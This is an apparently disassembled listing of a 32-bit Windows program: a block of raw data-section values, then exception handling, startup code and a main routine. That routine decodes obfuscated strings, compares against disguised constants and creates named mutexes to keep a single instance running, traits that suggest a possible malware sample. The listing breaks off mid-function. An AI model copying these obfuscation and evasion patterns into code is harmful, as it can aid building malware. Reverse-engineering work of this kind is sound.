dd 70306930h, 81307C30h, 9C309230h, 0B530A430h, 0CB30BB30h
dd 0D830D130h, 0FC30E330h, 14310A30h, 3B312131h, 4F314131h
dd 60315931h, 75316C31h, 88317F31h, 9C318F31h, 0A931A231h
dd 0BC31B531h, 0D731CD31h, 931FD31h, 39322232h, 68325232h
dd 7E327832h, 9F329432h, 0B732A532h, 0DD32BE32h, 0B32F332h
dd 34331633h, 55334533h, 7F335B33h, 0DD339D33h, 233FA33h
dd 9C346034h, 0C834BD34h, 0ED34DC34h, 1934F334h, 3D353635h
dd 60354F35h, 83356B35h, 8E358935h, 0AA359935h, 0B535B035h
dd 0C635C035h, 0DB35D535h, 0E635E135h, 0F135EC35h, 0FC35F735h
dd 0B360135h, 1D361236h, 2D362836h, 38363336h, 43363E36h
dd 4E364936h, 59365436h, 6B366536h, 7B367636h, 8D368136h
dd 0A2369436h, 0B236AD36h, 0C536BE36h, 0DC36D136h, 0EF36E336h
dd 0FD36F636h, 0A370536h, 26372037h, 46373D37h, 6B376537h
dd 78377337h, 8D377E37h, 0AA379337h, 0C537B637h, 0EC37CA37h
dd 0FA37F137h, 3F380137h, 57384438h, 65385F38h, 0A938A338h
dd 0D538CF38h, 0E338DC38h, 0F038EB38h, 738F738h, 1D391139h
dd 33392839h, 52394B39h, 78395939h, 9E398839h, 0BF39A439h
dd 0D139CB39h, 439FD39h, 193A0A3Ah, 303A213Ah, 463A403Ah
dd 643A533Ah, 8D3A6B3Ah, 0A33A9C3Ah, 0BC3AAA3Ah, 0D23AC63Ah
dd 0E63AD93Ah, 0F33AEC3Ah, 0F3B073Ah, 2B3B1E3Bh, 523B383Bh
dd 5E3B583Bh, 993B6D3Bh, 0B13BA03Bh, 0E03BC33Bh, 23BEC3Bh
dd 143C0D3Ch, 0DB3C6D3Ch, 0ED3CE63Ch, 113D0B3Ch, 453D3D3Dh
dd 0A33D9C3Dh, 0B93DB33Dh, 0D13DC83Dh, 1B3DD73Dh, 5C3E413Eh
dd 843E663Eh, 903E893Eh, 9F3E983Eh, 0AB3EA53Eh, 0C23EBC3Eh
dd 0E03EDA3Eh, 0F93EF33Eh, 163EFF3Eh, 2C3F223Fh, 3B3F343Fh
dd 493F413Fh, 6F3F503Fh, 973F843Fh, 0BA3FA83Fh, 0E93FDD3Fh
dd 3FF83Fh, 600000h, 14800h, 26301400h, 44303A30h, 67305430h
dd 8B308630h, 0DF30CA30h, 0F730E830h, 1A310430h, 3E312E31h
dd 7E316C31h, 0B1318731h, 0D031B731h, 231E431h, 12320C32h
dd 22321832h, 37322B32h, 60323E32h, 7A326632h, 0B9328032h
dd 0D432C732h, 0F232E532h, 1F32FA32h, 32332D33h, 45333E33h
dd 7A337533h, 0A1339333h, 0BA33B433h, 0D733C933h, 0E933DC33h
dd 833F833h, 53343E34h, 77346734h, 0C034AD34h, 0F534EB34h
dd 0D34FB34h, 2E351C35h, 4D354635h, 90357A35h, 0F835AE35h
dd 1F361235h, 6A363B36h, 0D6367036h, 0E370836h, 1F371937h
dd 33372D37h, 47374137h, 3B382F37h, 79387338h, 94388D38h
dd 0B838AA38h, 7C38BE38h, 0A939A239h, 0EA39E239h, 3D39F139h
dd 583A493Ah, 6D3A5E3Ah, 853A733Ah, 0A43A9E3Ah, 4A3B293Ah
dd 9F3B983Bh, 2C3C263Bh, 983C713Ch, 0FF3C9E3Ch, 113D0C3Ch
dd 4C3D3F3Dh, 593D533Dh, 723D603Dh, 0A93DA33Dh, 0D53DCE3Dh
dd 43DED3Dh, 453E163Eh, 523E4C3Eh, 853E7F3Eh, 0EB3E973Eh
dd 93EF13Eh, 243F0F3Fh, 563F353Fh, 7E3F633Fh, 0D13F943Fh
dd 0E53FD83Fh, 3FEB3Fh, 700000h, 18C00h, 62305C00h, 78307230h
dd 8C308630h, 0AC30A630h, 0C830BA30h, 0F030CE30h, 430F630h
dd 1A310A31h, 38312131h, 65315B31h, 7F316F31h, 0DC31D531h
dd 18320C31h, 8E325932h, 532FF32h, 43332033h, 5F335933h
dd 81337B33h, 0A4339C33h, 0C133BA33h, 0D533CF33h, 49344033h
dd 0A347D34h, 1E351835h, 31352A35h, 89358235h, 43362E35h
dd 5A364936h, 70366A36h, 87368136h, 0A9369836h, 0CB36BB36h
dd 1B370636h, 32372C37h, 5B373B37h, 7A376537h, 0A0378F37h
dd 0BD37A637h, 0D337CC37h, 0FE37EC37h, 46381337h, 6E385C38h
dd 7E387838h, 0BD38AD38h, 0E338DC38h, 538FF38h, 24391E39h
dd 47393839h, 63394D39h, 90398439h, 0AB399939h, 0CB39B839h
dd 1239D439h, 253A173Ah, 443A393Ah, 653A4A3Ah, 873A7C3Ah
dd 0AB3AA43Ah, 0E13ADC3Ah, 0F93AF43Ah, 313B193Ah, 493B3C3Bh
dd 7A3B6B3Bh, 0A43B8E3Bh, 0B53BAF3Bh, 0DD3BC93Bh, 193BF83Bh
dd 393C203Ch, 593C403Ch, 8B3C603Ch, 9A3C913Ch, 0A73CA13Ch
dd 0C53CAC3Ch, 0E13CD83Ch, 0F83CF23Ch, 183D123Ch, 463D273Dh
dd 803D7A3Dh, 9F3D923Dh, 0AE3DA83Dh, 0C33DBB3Dh, 0D73DC93Dh
dd 73DFE3Dh, 203E1A3Eh, 5B3E433Eh, 7A3E753Eh, 933E893Eh
dd 0B53E993Eh, 0D33EC43Eh, 0E83EE33Eh, 173EF73Eh, 323F1E3Fh
dd 683F4E3Fh, 7C3F6D3Fh, 0B93FA93Fh, 0D63FC83Fh, 0F73FEE3Fh
dd 80003Fh, 17800h, 0B300500h, 3E303530h, 4A304330h, 0A1306730h
dd 0F030E230h, 630F630h, 2F312831h, 66315131h, 7B317331h
dd 0B731A031h, 0E231BD31h, 1D31E831h, 8B326332h, 0B932A032h
dd 932DE32h, 2B331B33h, 42333733h, 7D335133h, 0B433A433h
dd 0A33C733h, 2D342634h, 8B345934h, 0BA349134h, 0E734D334h
dd 14350434h, 44353E35h, 94358E35h, 0BD35A435h, 0E735D135h
dd 7360035h, 37363136h, 6F366A36h, 9C368E36h, 0B736A336h
dd 0F336ED36h, 2D372036h, 68374237h, 9D376E37h, 0D237C737h
dd 0F237DF37h, 1C380D37h, 44382238h, 70384A38h, 99387638h
dd 0CC38BC38h, 0A38DF38h, 1D391339h, 3E393139h, 5B394839h
dd 71396539h, 0BF39A039h, 0D239C839h, 0EC39DB39h, 39F539h
dd 223A153Ah, 7A3A703Ah, 0B63AAF3Ah, 0F83AE13Ah, 253B1F3Ah
dd 463B353Bh, 0A03B4C3Bh, 0D53BBE3Bh, 0F23BDB3Bh, 283BF83Bh
dd 623C2E3Ch, 6F3C693Ch, 0A73C7D3Ch, 0CA3CAD3Ch, 0D63CD03Ch
dd 1E3CDC3Ch, 3C3D233Dh, 643D503Dh, 7C3D693Dh, 0E83D903Dh
dd 0FA3DEE3Dh, 213E0D3Dh, 393E263Eh, 863E793Eh, 0D63E923Eh
dd 0FE3EF03Eh, 163F043Eh, 2D3F263Fh, 433F363Fh, 513F483Fh
dd 633F5E3Fh, 733F693Fh, 863F7A3Fh, 913F8C3Fh, 0AB3FA43Fh
dd 0D13FBE3Fh, 0F33FE43Fh, 3FFA3Fh, 900000h, 26000h, 1E301200h
dd 30302B30h, 48304230h, 63305630h, 79307230h, 0B8308030h
dd 0F530C030h, 15310030h, 55314431h, 6F316931h, 95317D31h
dd 0AD319B31h, 0BD31B631h, 0D131C431h, 0E031D731h, 0ED31E731h
dd 0B31F231h, 1F321632h, 44322632h, 5B325232h, 85327F32h
dd 0E932AB32h, 2A32EF32h, 7A333133h, 9D338133h, 0E333DB33h
dd 0C33F833h, 33342D34h, 4C344634h, 6C346634h, 9F349934h
dd 0D334CD34h, 0F234DF34h, 19350534h, 33352D35h, 45353835h
dd 50354B35h, 63355D35h, 75356835h, 80357B35h, 0B635B035h
dd 0EB35DE35h, 25361135h, 3F363936h, 5D365736h, 9B369536h
dd 0C736B336h, 0DE36CD36h, 0ED36E336h, 0FC36F536h, 19370436h
dd 38372637h, 97378E37h, 0A4379E37h, 0E937E437h, 137EF37h
dd 13380E38h, 29381C38h, 34382E38h, 49383C38h, 54384F38h
dd 90387938h, 0B038A238h, 0DB38D438h, 638FA38h, 1F391039h
dd 37392E39h, 4E393D39h, 5A395439h, 7D397039h, 97398A39h
dd 0A939A339h, 0C139AF39h, 0D739CF39h, 0EA39E539h, 0FF39F339h
dd 103A0A39h, 223A1D3Ah, 303A2A3Ah, 443A3E3Ah, 553A4D3Ah
dd 663A5B3Ah, 753A6E3Ah
dd 953A813Ah, 0AE3A9B3Ah, 0C03AB93Ah, 0EC3ADF3Ah, 0FA3AF13Ah
dd 0C3B073Ah, 1D3B113Bh, 283B233Bh, 393B2D3Bh, 443B3F3Bh
dd 553B493Bh, 603B5B3Bh, 713B653Bh, 7C3B773Bh, 8D3B813Bh
dd 983B933Bh, 0A93B9D3Bh, 0B43BAF3Bh, 0C53BB93Bh, 0D03BCB3Bh
dd 0E13BD53Bh, 0EC3BE73Bh, 0FD3BF13Bh, 83C033Bh, 193C0D3Ch
dd 243C1F3Ch, 353C293Ch, 403C3B3Ch, 513C453Ch, 5C3C573Ch
dd 6D3C613Ch, 783C733Ch, 8C3C7D3Ch, 973C923Ch, 0AC3C9F3Ch
dd 0BA3CB13Ch, 0CC3CC73Ch, 0DE3CD13Ch, 0E93CE43Ch, 33CFB3Ch
dd 0F3D093Dh, 343D193Dh, 4E3D3A3Dh, 673D553Dh, 723D6D3Dh
dd 0AF3D953Dh, 0BE3DB53Dh, 0D43DCB3Dh, 0E33DDA3Dh, 33DE93Dh
dd 133E0B3Eh, 293E1F3Eh, 3A3E2F3Eh, 553E4C3Eh, 823E5C3Eh
dd 0BA3E9E3Eh, 0D43ECC3Eh, 0EB3EDE3Eh, 33EF43Eh, 173F0E3Fh
dd 323F223Fh, 583F493Fh, 763F5E3Fh, 873F7C3Fh, 0A93FA23Fh
dd 0D53FCF3Fh, 3FFC3Fh, 0A00000h, 22400h, 10300600h, 2E302730h
dd 67305730h, 77307130h, 8A307D30h, 9B309030h, 0B330AC30h
dd 0E530DB30h, 1030F530h, 38312731h, 45313F31h, 79316031h
dd 84317F31h, 0A5319B31h, 0C231BC31h, 0E031D631h, 931F631h
dd 27321232h, 88325132h, 0C1329132h, 132C732h, 29332033h
dd 58335233h, 0A7336B33h, 0ED33B133h, 32340A33h, 3F343934h
dd 58344F34h, 89345F34h, 9F349234h, 0C934B134h, 0E134D034h
dd 0F734F134h, 17350434h, 2D351D35h, 46353435h, 64354C35h
dd 82357635h, 0A1358C35h, 0AD35A735h, 0EF35E235h, 1D361735h
dd 4A363436h, 71365036h, 87368136h, 0EE36D036h, 4B370236h
dd 5A375137h, 76377037h, 92378C37h, 0C537BC37h, 0E37DD37h
dd 28382238h, 4A383F38h, 6D385138h, 89387938h, 9B389538h
dd 0EA38B638h, 0E38F038h, 24391939h, 41393A39h, 82397B39h
dd 0AE39A239h, 0D639BC39h, 0EF39E639h, 0A39FE39h, 2A3A1D3Ah
dd 4F3A453Ah, 633A563Ah, 8C3A803Ah, 0A43A9E3Ah, 0CA3ABC3Ah
dd 0F93AEA3Ah, 0A3B033Ah, 2C3B1F3Bh, 3B3B363Bh, 603B553Bh
dd 723B663Bh, 8C3B833Bh, 0AB3B9B3Bh, 0D13BC63Bh, 0E43BD73Bh
dd 0F13BEA3Bh, 223BFE3Bh, 0BE3C5E3Ch, 0C93CC43Ch, 0E73CDC3Ch
dd 0F63CED3Ch, 283D223Ch, 593D533Dh, 703D673Dh, 8F3D843Dh
dd 0A13D983Dh, 0B03DAA3Dh, 0BD3DB73Dh, 0D73DC63Dh, 0E93DE33Dh
dd 0F33DEE3Dh, 53DFF3Dh, 0F3E0A3Eh, 213E1B3Eh, 2B3E263Eh
dd 3D3E373Eh, 473E423Eh, 593E533Eh, 633E5E3Eh, 753E6F3Eh
dd 7F3E7A3Eh, 913E8B3Eh, 9B3E963Eh, 0AD3EA73Eh, 0B73EB23Eh
dd 0C93EC33Eh, 0D33ECE3Eh, 0E53EDF3Eh, 0EF3EEA3Eh, 13EFB3Eh
dd 0B3F063Fh, 1D3F173Fh, 273F223Fh, 393F333Fh, 433F3E3Fh
dd 553F4F3Fh, 5F3F5A3Fh, 713F6B3Fh, 7B3F763Fh, 8D3F873Fh
dd 973F923Fh, 0A93FA33Fh, 0B33FAE3Fh, 0C53FBF3Fh, 0CF3FCA3Fh
dd 0E13FDB3Fh, 0EB3FE63Fh, 0FD3FF73Fh, 0B0003Fh, 27C00h
dd 7300200h, 19301330h, 23301E30h, 35302F30h, 3F303A30h
dd 51304B30h, 5B305630h, 6D306730h, 77307230h, 89308330h
dd 93308E30h, 0A5309F30h, 0AF30AA30h, 0C130BB30h, 0CB30C630h
dd 0DD30D730h, 0E730E230h, 0F930F330h, 330FE30h, 15310F31h
dd 1F311A31h, 31312B31h, 3B313631h, 4D314731h, 57315231h
dd 69316331h, 73316E31h, 85317F31h, 8F318A31h, 0A1319B31h
dd 0AB31A631h, 0BD31B731h, 0C731C231h, 0D931D331h, 0E331DE31h
dd 0F531EF31h, 0FF31FA31h, 11320B31h, 1B321632h, 2D322732h
dd 37323232h, 49324332h, 53324E32h, 65325F32h, 6F326A32h
dd 81327B32h, 8B328632h, 9D329732h, 0A732A232h, 0B932B332h
dd 0C332BE32h, 0D532CF32h, 0DF32DA32h, 0F132EB32h, 0FB32F632h
dd 0D330732h, 17331233h, 29332333h, 33332E33h, 4B334533h
dd 0B1335033h, 0BC33B733h, 10340933h, 2C341E34h, 40343334h
dd 52344C34h, 66346034h, 82347434h, 9A349434h, 0AD34A634h
dd 0C734B934h, 0DA34CD34h, 1934E434h, 30352035h, 47353B35h
dd 63355A35h, 72356C35h, 8A358335h, 0AB359D35h, 0BE35B135h
dd 0DC35D035h, 0F035E335h, 935FA35h, 1D361236h, 2E362336h
dd 43363736h, 5C365136h, 6F366536h, 85367D36h, 99368E36h
dd 0B7369F36h, 0CD36C036h, 0F936D936h, 21371136h, 4D374237h
dd 78376D37h, 8E378537h, 0B537A737h, 0D837BF37h, 137F637h
dd 1C381638h, 41383B38h, 75386F38h, 0B838B138h, 0CC38C638h
dd 0F238DF38h, 0B38F838h, 24391E39h, 39393339h, 74395939h
dd 8E397A39h, 0BF399839h, 0F239E039h, 439FF39h, 163A0A3Ah
dd 3B3A323Ah, 713A4F3Ah, 943A773Ah, 0A63A9A3Ah, 0FF3AAE3Ah
dd 133B0C3Ah, 333B263Bh, 703B493Bh, 823B7D3Bh, 0D23B893Bh
dd 0E33BDD3Bh, 193C013Bh, 323C2C3Ch, 513C4B3Ch, 6F3C683Ch
dd 0D53CCF3Ch, 0F13CEB3Ch, 153D073Ch, 393D2B3Dh, 5E3D4F3Dh
dd 763D713Dh, 0C93D7C3Dh, 0DD3DD63Dh, 0F03DE93Dh, 523E453Dh
dd 603E573Eh, 723E6D3Eh, 833E773Eh, 8E3E893Eh, 9F3E933Eh
dd 0AA3EA53Eh, 0BB3EAF3Eh, 0C63EC13Eh, 0D73ECB3Eh, 0E23EDD3Eh
dd 0F63EE73Eh, 13EFC3Eh, 4C3F203Fh, 753F663Fh, 9A3F803Fh
dd 0C73FA43Fh, 3FE63Fh, 0C00000h, 3000h, 7A300400h, 8A308230h
dd 93309230h, 0A2389A38h, 9E38AA38h, 0B639AA39h, 0CE39C239h
dd 0E639DA39h, 0FE39F239h, 163A0A39h, 140003Ah, 4400h
dd 7C300000h, 24332032h, 2C332833h, 34333033h, 40333833h
dd 48334433h, 50334C33h, 58335433h, 64335C33h, 6C336833h
dd 74337033h, 7C337833h, 84338033h, 8C378837h, 379037h
dd 1600000h, 2000h, 98319400h, 0AC319C31h, 0B431B031h
dd 0BC31B831h, 0C431C031h, 31C831h, 71h dup(0)
dd 4B2FFD00h, 47h, 1902800h, 3 dup(100h), 1903400h, 1903800h
dd 1903C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 0B75F00h, 1904000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 416Ah dup(0)
_data ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 0003A000)
; Virtual size : 0000BA20 ( 47648.)
; Section size in file : 0000BA20 ( 47648.)
; Offset to raw data for section: 0003A000
; Flags 60000020: Text Executable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 43A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_43A006: ; DATA XREF: sub_43A026+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_43A025
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_43A025: ; CODE XREF: .text:0043A014�j
retn
; =============== S U B R O U T I N E =======================================
sub_43A026 proc near ; CODE XREF: .text:0043A14E�p
; .text:0043A17C�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_43A006
push large dword ptr fs:0
mov large fs:0, esp
loc_43A043: ; CODE XREF: sub_43A026+44�j
; sub_43A026+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43A072
cmp esi, [esp+1Ch+arg_4]
jz short loc_43A072
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43A043
call dword ptr [ebx+esi*4+8]
jmp short loc_43A043
; ---------------------------------------------------------------------------
loc_43A072: ; CODE XREF: sub_43A026+2A�j
; sub_43A026+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43A026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A080 proc near ; CODE XREF: .text:0043A141�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_43A098
push [ebp+arg_0]
call sub_4459B4
loc_43A098: ; DATA XREF: sub_43A080+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43A080 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43A175
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43A0D3: ; CODE XREF: .text:0043A16C�j
cmp esi, 0FFFFFFFFh
jz loc_43A184
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43A163
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword_44D034, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword_44D038, eax
mov eax, [edx+4]
mov dword_44D03C, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_44D040
mov esi, dword_44D038
rep movsd
lea edi, dword_44D040
mov dword_44D038, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43A163
js short loc_43A171
mov edi, [ebx+8]
push ebx
call sub_43A080
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43A026
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43A163: ; CODE XREF: .text:0043A0E4�j
; .text:0043A139�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43A0D3
; ---------------------------------------------------------------------------
loc_43A171: ; CODE XREF: .text:0043A13B�j
xor eax, eax
jmp short loc_43A18E
; ---------------------------------------------------------------------------
loc_43A175: ; CODE XREF: .text:0043A0B8�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43A026
add esp, 0Ch
loc_43A184: ; CODE XREF: .text:0043A0D6�j
push 0Bh
call sub_4459FC
add esp, 4
loc_43A18E: ; CODE XREF: .text:0043A173�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43A1A7
call sub_43A1C3
loc_43A1A7: ; CODE XREF: .text:0043A1A0�j
call sub_44593F
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, off_44D000
call eax ; sub_445914
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A1C3 proc near ; CODE XREF: .text:0043A1A2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_4459CC
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_4459CC
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_4459CC
mov [ebp+var_C], eax
push (offset aWr+2)
push [ebp+var_8]
call sub_4459C0
mov dword_44D008, eax
push offset aWr ; "wr"
push [ebp+var_4]
call sub_4459C0
mov dword_44D004, eax
push offset aWr ; "wr"
push [ebp+var_C]
call sub_4459C0
add esp, 30h
mov dword_44D00C, eax
mov edi, dword_44D004
or edi, edi
jz short loc_43A23C
push 0
push edi
call sub_445A08
add esp, 8
loc_43A23C: ; CODE XREF: sub_43A1C3+6C�j
mov edi, dword_44D00C
or edi, edi
jz short loc_43A256
push 0
push edi
call sub_445A08
add esp, 8
call sub_43A25C
loc_43A256: ; CODE XREF: sub_43A1C3+81�j
pop edi
leave
retn
sub_43A1C3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A25C proc near ; CODE XREF: sub_43A1C3+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_4459A8
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43A294
; ---------------------------------------------------------------------------
loc_43A278: ; CODE XREF: sub_43A25C+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_43A280
inc [ebp+var_C]
loc_43A280: ; CODE XREF: sub_43A25C+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43A294: ; CODE XREF: sub_43A25C+1A�j
cmp byte ptr [ebx], 0
jnz short loc_43A278
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_4459F0
pop ecx
mov [ebp+var_8], eax
mov dword_44D010, eax
cmp [ebp+var_8], 0
jnz short loc_43A2C2
xor eax, eax
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2C2: ; CODE XREF: sub_43A25C+60�j
mov ebx, [ebp+var_10]
jmp short loc_43A30C
; ---------------------------------------------------------------------------
loc_43A2C7: ; CODE XREF: sub_43A25C+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_43A306
push [ebp+var_4]
call sub_4459F0
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_43A2F4
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2F4: ; CODE XREF: sub_43A25C+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_445A14
add esp, 8
add [ebp+var_8], 4
loc_43A306: ; CODE XREF: sub_43A25C+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43A30C: ; CODE XREF: sub_43A25C+69�j
cmp byte ptr [ebx], 0
jnz short loc_43A2C7
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_43A31F: ; CODE XREF: sub_43A25C+64�j
; sub_43A25C+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A25C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A324 proc near ; DATA XREF: .data:off_44D340�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44ECC4
push esi
call ds:dword_44C824
or eax, eax
jz short loc_43A350
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43A398
; ---------------------------------------------------------------------------
loc_43A350: ; CODE XREF: sub_43A324+1A�j
push offset dword_44EC34
push esi
call ds:dword_44C824
or eax, eax
jz short loc_43A370
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43A398
; ---------------------------------------------------------------------------
loc_43A370: ; CODE XREF: sub_43A324+3A�j
push offset dword_44EC04
push esi
call ds:dword_44C824
or eax, eax
jz short loc_43A390
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43A398
; ---------------------------------------------------------------------------
loc_43A390: ; CODE XREF: sub_43A324+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43A398: ; CODE XREF: sub_43A324+2A�j
; sub_43A324+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43A324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A39F proc near ; DATA XREF: sub_44475F+C�o
; sub_44475F+29F�o
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 15Ch
push ebx
push esi
push edi
call sub_43AFA1
call sub_43AD9A
call sub_444E43
call sub_43CE34
call sub_4427FF
call sub_441F34
call sub_442C9D
call sub_43B3E1
call sub_4409DF
mov esi, eax
loc_43A3DA: ; CODE XREF: sub_43A39F+91�j
call sub_4430CE
mov edx, eax
mov [ebp+var_144], dl
movzx eax, [ebp+var_144]
mov edx, dword_44D178
sub edx, 3
cmp eax, edx
jnz short loc_43A40A
mov eax, dword_44D24C
sub eax, 8
push eax
call ds:dword_44C840 ; ExitThread
loc_43A40A: ; CODE XREF: sub_43A39F+5A�j
movzx eax, [ebp+var_144]
mov edx, dword_44D100
sub edx, 6
cmp eax, edx
jnz short loc_43A432
movsx eax, word_44D160
add eax, 5Eh
push eax
call ds:dword_44C80C
pop ecx
jmp short loc_43A3DA
; ---------------------------------------------------------------------------
loc_43A432: ; CODE XREF: sub_43A39F+7D�j
or esi, esi
jnz loc_43A4F4
push offset dword_44EB94
call sub_43AC82
mov [ebp+var_154], eax
push offset word_44EB8A
call sub_43AC82
push eax
mov edx, [ebp+var_154]
push edx
lea edx, [ebp+var_143]
push edx
call ds:dword_44C810
lea eax, [ebp+var_143]
push eax
push 0
push 0
call ds:dword_44C7EC ; CreateMutexA
mov edi, eax
push offset word_44EB7E
call sub_43AC82
mov [ebp+var_158], eax
push offset dword_44EB74
call sub_43AC82
mov edx, dword_44D240
add edx, 5
push edx
push eax
mov edx, [ebp+var_158]
push edx
lea edx, [ebp+var_143]
push edx
call ds:dword_44C810
add esp, 2Ch
lea eax, [ebp+var_143]
push eax
push 1
push 0
call ds:dword_44C7EC ; CreateMutexA
mov edi, eax
or edi, edi
jnz short loc_43A4DE
mov eax, dword_44D158
sub eax, 7
push eax
call ds:dword_44C840 ; ExitThread
loc_43A4DE: ; CODE XREF: sub_43A39F+12E�j
mov eax, dword_44D14C
add eax, 0FFFFFFF7h
add eax, dword_44D1A0
push eax
push edi
call ds:dword_44C808 ; WaitForSingleObject
loc_43A4F4: ; CODE XREF: sub_43A39F+95�j
push 0
call ds:dword_449598 ; GetModuleHandleA
mov ebx, eax
push offset word_44EB6A
call sub_43AC82
mov [ebp+var_20], eax
mov [ebp+var_34], ebx
lea eax, sub_4446E4
mov [ebp+var_40], eax
push 7F00h
push 0
call ds:dword_44A1E4 ; LoadCursorA
mov [ebp+var_2C], eax
push 7F03h
push 0
call ds:dword_44C7F4 ; LoadIconA
mov [ebp+var_30], eax
and [ebp+var_24], 0
push 0
call ds:dword_4480D0 ; GetStockObject
mov [ebp+var_28], eax
mov [ebp+var_44], 3
